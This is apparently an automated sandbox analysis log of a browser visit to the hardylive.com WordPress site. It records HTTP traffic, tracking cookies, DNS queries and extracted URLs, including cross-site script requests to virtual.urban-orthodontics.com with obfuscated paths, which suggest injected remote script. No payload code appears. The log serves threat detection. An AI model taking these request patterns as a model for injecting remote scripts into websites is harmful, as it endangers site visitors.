        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc.9.7.1 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hardylive.com/category/eprint/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_first_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F134.0.0.0%20Safari%2F537.36; mtk_src_trk=%7B%22type%22%3A%22typein%22%2C%22url%22%3A%22https%3A%2F%2Fhardylive.com%2F%22%2C%22mtke%22%3A%22(none)%22%2C%22utm_campaign%22%3A%22(none)%22%2C%22utm_source%22%3A%22(direct)%22%2C%22utm_medium%22%3A%22(none)%22%2C%22utm_content%22%3A%22(none)%22%2C%22utm_id%22%3A%22(none)%22%2C%22utm_term%22%3A%22(none)%22%2C%22session_entry%22%3A%22https%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%22%2C%22session_start_time%22%3A%222025-03-11%2018%3A03%3A01%22%2C%22session_pages%22%3A%221%22%2C%22session_count%22%3A%221%22%7D; sbjs_session=pgs%3D2%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F
        Source: global trafficHTTP traffic detected: GET /ad.php?do=imp&aid=1125399&zid=117078&t=1741716181&auth=108567e63140a07de4bc55b82a10706c&oid=27064&wd=-1&ht=-1&ref=https%3A%2F%2Fhardylive.com%2F&uri=https%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F HTTP/1.1Host: g.adspeed.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: impuniraw=1125399-1741802586
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=aab4a5 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hardylive.com/category/eprint/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_first_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F134.0.0.0%20Safari%2F537.36; mtk_src_trk=%7B%22type%22%3A%22typein%22%2C%22url%22%3A%22https%3A%2F%2Fhardylive.com%2F%22%2C%22mtke%22%3A%22(none)%22%2C%22utm_campaign%22%3A%22(none)%22%2C%22utm_source%22%3A%22(direct)%22%2C%22utm_medium%22%3A%22(none)%22%2C%22utm_content%22%3A%22(none)%22%2C%22utm_id%22%3A%22(none)%22%2C%22utm_term%22%3A%22(none)%22%2C%22session_entry%22%3A%22https%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%22%2C%22session_start_time%22%3A%222025-03-11%2018%3A03%3A01%22%2C%22session_pages%22%3A%221%22%2C%22session_count%22%3A%221%22%7D; sbjs_session=pgs%3D2%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/sites/35/2022/09/LRRE_Webad-1.gif HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://hardylive.com/category/eprint/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_first_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F134.0.0.0%20Safari%2F537.36; mtk_src_trk=%7B%22type%22%3A%22typein%22%2C%22url%22%3A%22https%3A%2F%2Fhardylive.com%2F%22%2C%22mtke%22%3A%22(none)%22%2C%22utm_campaign%22%3A%22(none)%22%2C%22utm_source%22%3A%22(direct)%22%2C%22utm_medium%22%3A%22(none)%22%2C%22utm_content%22%3A%22(none)%22%2C%22utm_id%22%3A%22(none)%22%2C%22utm_term%22%3A%22(none)%22%2C%22session_entry%22%3A%22https%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%22%2C%22session_start_time%22%3A%222025-03-11%2018%3A03%3A01%22%2C%22session_pages%22%3A%221%22%2C%22session_count%22%3A%221%22%7D; sbjs_session=pgs%3D2%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/mailster/build/form/view.js?ver=70940c37d1c4b44da053 HTTP/1.1Host: hardylive.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hardylive.com/category/eprint/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_first_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F134.0.0.0%20Safari%2F537.36; mtk_src_trk=%7B%22type%22%3A%22typein%22%2C%22url%22%3A%22https%3A%2F%2Fhardylive.com%2F%22%2C%22mtke%22%3A%22(none)%22%2C%22utm_campaign%22%3A%22(none)%22%2C%22utm_source%22%3A%22(direct)%22%2C%22utm_medium%22%3A%22(none)%22%2C%22utm_content%22%3A%22(none)%22%2C%22utm_id%22%3A%22(none)%22%2C%22utm_term%22%3A%22(none)%22%2C%22session_entry%22%3A%22https%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%22%2C%22session_start_time%22%3A%222025-03-11%2018%3A03%3A01%22%2C%22session_pages%22%3A%221%22%2C%22session_count%22%3A%221%22%7D; sbjs_session=pgs%3D2%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F
        Source: global trafficHTTP traffic detected: GET /4YLo6Zqgi4CFoNLb17HEy5L2jZnDuMqIj+OEkJvnt4+RoMTLk6DSy4TskYOO6pudjaCV HTTP/1.1Host: virtual.urban-orthodontics.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-json/mailster/v1/forms/12823/impression?_locale=user HTTP/1.1Host: hardylive.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_first_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F134.0.0.0%20Safari%2F537.36; mtk_src_trk=%7B%22type%22%3A%22typein%22%2C%22url%22%3A%22https%3A%2F%2Fhardylive.com%2F%22%2C%22mtke%22%3A%22(none)%22%2C%22utm_campaign%22%3A%22(none)%22%2C%22utm_source%22%3A%22(direct)%22%2C%22utm_medium%22%3A%22(none)%22%2C%22utm_content%22%3A%22(none)%22%2C%22utm_id%22%3A%22(none)%22%2C%22utm_term%22%3A%22(none)%22%2C%22session_entry%22%3A%22https%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%22%2C%22session_start_time%22%3A%222025-03-11%2018%3A03%3A01%22%2C%22session_pages%22%3A%221%22%2C%22session_count%22%3A%221%22%7D; sbjs_session=pgs%3D2%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F
        Source: global trafficHTTP traffic detected: GET /ULrfTSuYvCQ0mOV/ZonzbyPOuj1ygP0hMdS7JD7dgCs51rpvfJitb2qYuzU4zLs1ON2vJz3I/TA= HTTP/1.1Host: virtual.urban-orthodontics.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /DMHDyHfjoKFo4/n6OvLv6n+1prgu++Gkba+noWKmnLt4oLe7Lu3hu3jj+fkg47HqNuO5oWCusqtrrLSrLrw= HTTP/1.1Host: virtual.urban-orthodontics.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /KAKxe1Mg0hJMIItJHjGdWVt21AsKOJMXSWzVEkZl7ghcY8UICi6TCFwgi0kEIMNZEiDZEUdh2Q5ZZMcUUHvIAUEgzA== HTTP/1.1Host: virtual.urban-orthodontics.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /mMawr+Pk08b85IqdrvWcjeuy1d+6/JLD+ajUxvah79zsp8TcuuqS3Ozkipy05MKNouTV3f6y18viq5LS HTTP/1.1Host: virtual.urban-orthodontics.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://hardylive.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /DMHDyHfjoKFo4/n6OvLv6n+1prgu++Gkba+noWKmnLt4oLe7Lu3hu3jj+fkg47HqNuO5oWCusqtrrLSrLrw= HTTP/1.1Host: virtual.urban-orthodontics.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /KAKxe1Mg0hJMIItJHjGdWVt21AsKOJMXSWzVEkZl7ghcY8UICi6TCFwgi0kEIMNZEiDZEUdh2Q5ZZMcUUHvIAUEgzA== HTTP/1.1Host: virtual.urban-orthodontics.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /mMawr+Pk08b85IqdrvWcjeuy1d+6/JLD+ajUxvah79zsp8TcuuqS3Ozkipy05MKNouTV3f6y18viq5LS HTTP/1.1Host: virtual.urban-orthodontics.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: hardylive.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
        Source: chromecache_168.2.drString found in binary or memory: <a href="https://www.facebook.com/login/?next=https%3A%2F%2Fwww.facebook.com%2FMoorefieldExaminer%2F" target='_blank' rel='external noopener nofollow' aria-label="Find us on Facebook" class="jeg_facebook"><i class="fa fa-facebook"></i> </a></div> equals www.facebook.com (Facebook)
        Source: chromecache_168.2.drString found in binary or memory: <a href="https://www.facebook.com/login/?next=https%3A%2F%2Fwww.facebook.com%2FMoorefieldExaminer%2F" target='_blank' rel='external noopener nofollow' aria-label="Find us on Facebook" class="jeg_facebook"><i class="fa fa-facebook"></i> </a></div><div class="jeg_aside_item jeg_aside_copyright"> equals www.facebook.com (Facebook)
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: hardylive.com
        Source: global trafficDNS traffic detected: DNS query: apiexplorerzone.com
        Source: global trafficDNS traffic detected: DNS query: g.adspeed.net
        Source: global trafficDNS traffic detected: DNS query: virtual.urban-orthodontics.com
        Source: global trafficDNS traffic detected: DNS query: static.mailster.co
        Source: global trafficDNS traffic detected: DNS query: adserver.paywallproject.com
        Source: unknownHTTP traffic detected: POST /wp-json/mailster/v1/forms/12823/impression?_locale=user HTTP/1.1Host: hardylive.comConnection: keep-aliveContent-Length: 103X-WP-Nonce: 5a36b08978sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, */*;q=0.1sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: application/jsonsec-ch-ua-mobile: ?0Origin: https://hardylive.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://hardylive.com/category/eprint/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_first_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F134.0.0.0%20Safari%2F537.36; mtk_src_trk=%7B%22type%22%3A%22typein%22%2C%22url%22%3A%22https%3A%2F%2Fhardylive.com%2F%22%2C%22mtke%22%3A%22(none)%22%2C%22utm_campaign%22%3A%22(none)%22%2C%22utm_source%22%3A%22(direct)%22%2C%22utm_medium%22%3A%22(none)%22%2C%22utm_content%22%3A%22(none)%22%2C%22utm_id%22%3A%22(none)%22%2C%22utm_term%22%3A%22(none)%22%2C%22session_entry%22%3A%22https%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%22%2C%22session_start_time%22%3A%222025-03-11%2018%3A03%3A01%22%2C%22session_pages%22%3A%221%22%2C%22session_count%22%3A%221%22%7D; sbjs_session=pgs%3D2%7C%7C%7Ccpg%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: cloudflareDate: Tue, 11 Mar 2025 18:03:01 GMTContent-Type: text/htmlContent-Length: 553Connection: closeCF-RAY: 91ecf7569b63c495-SEA
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 11 Mar 2025 18:03:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://hardylive.com/wp-json/>; rel="https://api.w.org/"
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 11 Mar 2025 18:03:19 GMTContent-Type: application/json; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Robots-Tag: noindexLink: <https://hardylive.com/wp-json/>; rel="https://api.w.org/"X-Content-Type-Options: nosniffAccess-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, LinkAccess-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-TypeVary: Origin
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 11 Mar 2025 18:03:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 11 Mar 2025 18:03:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 11 Mar 2025 18:03:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
        Source: chromecache_191.2.drString found in binary or memory: http://css-tricks.com/snippets/jquery/move-cursor-to-end-of-textarea-or-input/
        Source: chromecache_132.2.dr, chromecache_170.2.drString found in binary or memory: http://fontawesome.io
        Source: chromecache_132.2.dr, chromecache_170.2.drString found in binary or memory: http://fontawesome.io/license
        Source: chromecache_132.2.drString found in binary or memory: http://getharvest.com
        Source: chromecache_203.2.dr, chromecache_168.2.drString found in binary or memory: http://gmpg.org/xfn/11
        Source: chromecache_147.2.drString found in binary or memory: http://jegtheme.com/
        Source: chromecache_165.2.drString found in binary or memory: http://malsup.com/jquery/block/
        Source: chromecache_181.2.dr, chromecache_189.2.drString found in binary or memory: http://ns.attribution.com/ads/1.0/
        Source: chromecache_168.2.drString found in binary or memory: http://ogp.me/ns#
        Source: chromecache_168.2.drString found in binary or memory: http://ogp.me/ns/article#
        Source: chromecache_147.2.drString found in binary or memory: http://themeforest.net
        Source: chromecache_152.2.drString found in binary or memory: http://themeforest.net/?ref=jegtheme
        Source: chromecache_152.2.drString found in binary or memory: http://themeforest.net/user/jegtheme?ref=jegtheme
        Source: chromecache_147.2.dr, chromecache_152.2.drString found in binary or memory: http://www.gnu.org/licenses/gpl-2.0.html
        Source: chromecache_165.2.drString found in binary or memory: http://www.gnu.org/licenses/gpl.html
        Source: chromecache_165.2.drString found in binary or memory: http://www.opensource.org/licenses/mit-license.php
        Source: chromecache_113.2.drString found in binary or memory: http://www.satollo.net/css-and-select-space-between-the-options-and-the-arrow
        Source: chromecache_203.2.dr, chromecache_168.2.drString found in binary or memory: https://BURKEANDHERBERTBANK.COM
